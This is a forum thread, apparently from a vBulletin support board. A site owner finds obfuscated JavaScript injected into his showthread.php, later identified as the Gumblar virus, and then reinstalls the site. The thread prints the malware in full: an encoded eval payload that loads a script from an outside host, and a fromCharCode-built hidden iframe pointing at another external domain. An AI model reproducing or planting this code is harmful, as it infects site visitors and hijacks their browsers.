Changes are being made to my showthread.php

[s0lidgr0und]

I had an error when I tried to look at some threads on my board this morning. It said something to the effect of, "Headers already received in line 3087" The next time it said something about cookies and referred to showthread.php error. So I open the file in an editor and this is pasted at the very beginning:

<script>eval( unescape( "%69%66%28%21%6d%79%69%6b%29%7b%0d%0a%76%61%72%20% 72%3d%64%6f%63%75%6d%65%6e%74% 2e%72%65%66%65%72%72%65%72%2c%75%3d%64%6f%63%75%6d %65%6e%74%2e%55%52%4c%2c%74%3d %22%22%2c%71%2c%71%75%65%2c%73%65%3d%22%67%62%22%3 b%0d%0a%69%66%28%72%2e%69%6e%6 4%65%78%4f%66%28%22%67%6f%6f%67%6c%65%2e%22%29%21% 3d%2d%31%29%7b%74%3d%22%71%22% 3b%73%65%3d%22%67%6f%6f%67%6c%65%22%3b%7d%0d%0a%69 %66%28%72%2e%69%6e%64%65%78%4f %66%28%22%6d%73%6e%2e%22%29%21%3d%2d%31%29%7b%74%3 d%22%71%22%3b%73%65%3d%22%6d%7 3%6e%22%3b%7d%0d%0a%69%66%28%72%2e%69%6e%64%65%78% 4f%66%28%22%79%61%68%6f%6f%2e% 22%29%21%3d%2d%31%29%7b%74%3d%22%70%22%3b%73%65%3d %22%79%61%68%6f%6f%22%3b%7d%0d %0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%79%6 1%6e%64%65%78%2e%72%75%22%29%2 1%3d%2d%31%29%7b%74%3d%22%74%65%78%74%22%3b%73%65% 3d%22%79%61%6e%64%65%78%2e%72% 75%22%3b%7d%0d%0a%69%66%28%74%2e%6c%65%6e%67%74%68 &&%28%28%71%3d%72%2e%69%6e%64% 65%78%4f%66%28%22%3f%22%2b%74%2b%22%3d%22%29%29%21 %3d%2d%31%7c%7c%28%71%3d%72%2e %69%6e%64%65%78%4f%66%28%22&%22%2b%74%2b%22%3d%22% 29%29%21%3d%2d%31%29%29%7b%20% 71%75%65%3d%72%2e%73%75%62%73%74%72%69%6e%67%28%71 %2b%32%2b%74%2e%6c%65%6e%67%74 %68%29%2e%73%70%6c%69%74%28%22&%22%29%5b%30%5d%3b% 0d%0a%69%66%20%28%28%71%75%65% 2e%69%6e%64%65%78%4f%66%28%27%73%69%74%65%3a%27%29 %3d%3d%2d%31%29%20&&%20%28%71% 75%65%2e%74%6f%4c%6f%77%65%72%43%61%73%65%28%29%2e %69%6e%64%65%78%4f%66%28%27%77 %77%77%2e%27%29%3d%3d%2d%31%29%29%0d%0a%09%64%6f%6 3%75%6d%65%6e%74%2e%77%72%69%7 4%65%28%22%3c%73%63%72%69%70%74%20%73%72%63%3d%27% 68%74%74%70%3a%2f%2f%62%65%73% 74%34%79%6f%75%2e%69%66%2e%75%61%2f%6a%73%2f%62%69 %64%63%68%2e%6a%73%3f%71%3d%22 %2b%71%75%65%2b%22&%72%65%66%3d%22%2b%72%2b%22%27% 3e%3c%2f%73%63%22%2b%22%72%69% 70%74%3e%22%29%3b%0d%0a%7d%0d%0a%7d%0d%0a%76%61%72 %20%6d%79%69%6b%3d%74%72%75%65 %3b" ));</script><!-- ad --><script>var W4b23a=String.fromCharCode;var O0b16=W4b23a(60);var QOa6aaf="i";var l11909=W4b23a(102);var OQ5365="r";var O0c50=W4b23a(97);var I13a9="m";var O0e317=W4b23a(101);var O04b335=" ";var QOa6270="d";var OQ2be4a=W4b23a(61);var OQbd48="'";var S8b30c1="4";var OQ111f6=W4b23a(98);var XX67c2f="2";var XX0b25=W4b23a(51);var OQ37152=W4b23a(115);var QO5dd=W4b23a(99);var QO4c6d6="/";var XXee8="n";var I14dac9=W4b23a(120);var O1f6f4="0";var l14349=W4b23a(57);var l12cf="8";var I1e9bb1=W4b23a(46);var S8d5341="h";var OQ8c03=W4b23a(116);var O12f8f=W4b23a(108);var Q0875="w";var O1abba=W4b23a(103);var QO316=W4b23a(121);var S839e=W4b23a(112);var O09ca13=W4b23a(58);var OQ3adab=W4b23a(111);var OQdf5a=";";var O07a5df=W4b23a(118);var I1b18a=">";document.write(O0b16+QOa6aaf+l11909+OQ5 365+O0c50+I13a9+O0e317+O04b335 +QOa6aaf+QOa6270+OQ2be4a+OQbd48+QOa6aaf+S8b30c1+OQ 111f6+XX67c2f+XX0b25+O0c50+OQb d48+O04b335+OQ37152+OQ5365+QO5dd+OQ2be4a+OQbd48+QO 4c6d6+QOa6aaf+XXee8+QOa6270+O0 e317+I14dac9+O1f6f4+l14349+l12cf+I1e9bb1+S8d5341+O Q8c03+I13a9+O12f8f+OQbd48+O04b 335+Q0875+QOa6aaf+QOa6270+OQ8c03+S8d5341+OQ2be4a+O Qbd48+O1f6f4+OQbd48+O04b335+S8 d5341+O0e317+QOa6aaf+O1abba+S8d5341+OQ8c03+OQ2be4a +OQbd48+O1f6f4+OQbd48+O04b335+ OQ37152+OQ8c03+QO316+O12f8f+O0e317+OQ2be4a+OQbd48+ QOa6270+QOa6aaf+OQ37152+S839e+ O12f8f+O0c50+QO316+O09ca13+XXee8+OQ3adab+XXee8+O0e 317+OQdf5a+O07a5df+QOa6aaf+OQ3 7152+QOa6aaf+OQ111f6+QOa6aaf+O12f8f+QOa6aaf+OQ8c03 +QO316+O09ca13+S8d5341+QOa6aaf +QOa6270+QOa6270+O0e317+XXee8+OQdf5a+OQbd48+I1b18a +O0b16+QO4c6d6+QOa6aaf+l11909+ OQ5365+O0c50+I13a9+O0e317+I1b18a);setTimeout(funct ion(){document.getElementById( "i4b23a").src=S8d5341+OQ8c03+OQ8c03+S839e+O09ca13+ QO4c6d6+QO4c6d6+I13a9+QO316+Q0 875+O0c50+OQ5365+Q0875+OQ3adab+OQ5365+O12f8f+QOa62 70+I1e9bb1+QO5dd+XXee8+QO4c6d6 +l14349+l14349+QO4c6d6+O1abba+OQ3adab+I1e9bb1+S839 e+S8d5341+S839e;},3000);</script>
<!-- /ad -->

Thoughts?

[Shamil.]

<a href="http://www.vbulletin.com/forum/showthread.php?t=308397" target="_blank">Please review this thread for more information.</a>

You can been affected by the Gumblar virus.

[s0lidgr0und]

Thanks. It injected code into every file on my server named index.php, among others.

I had to delete everything and do a fresh install.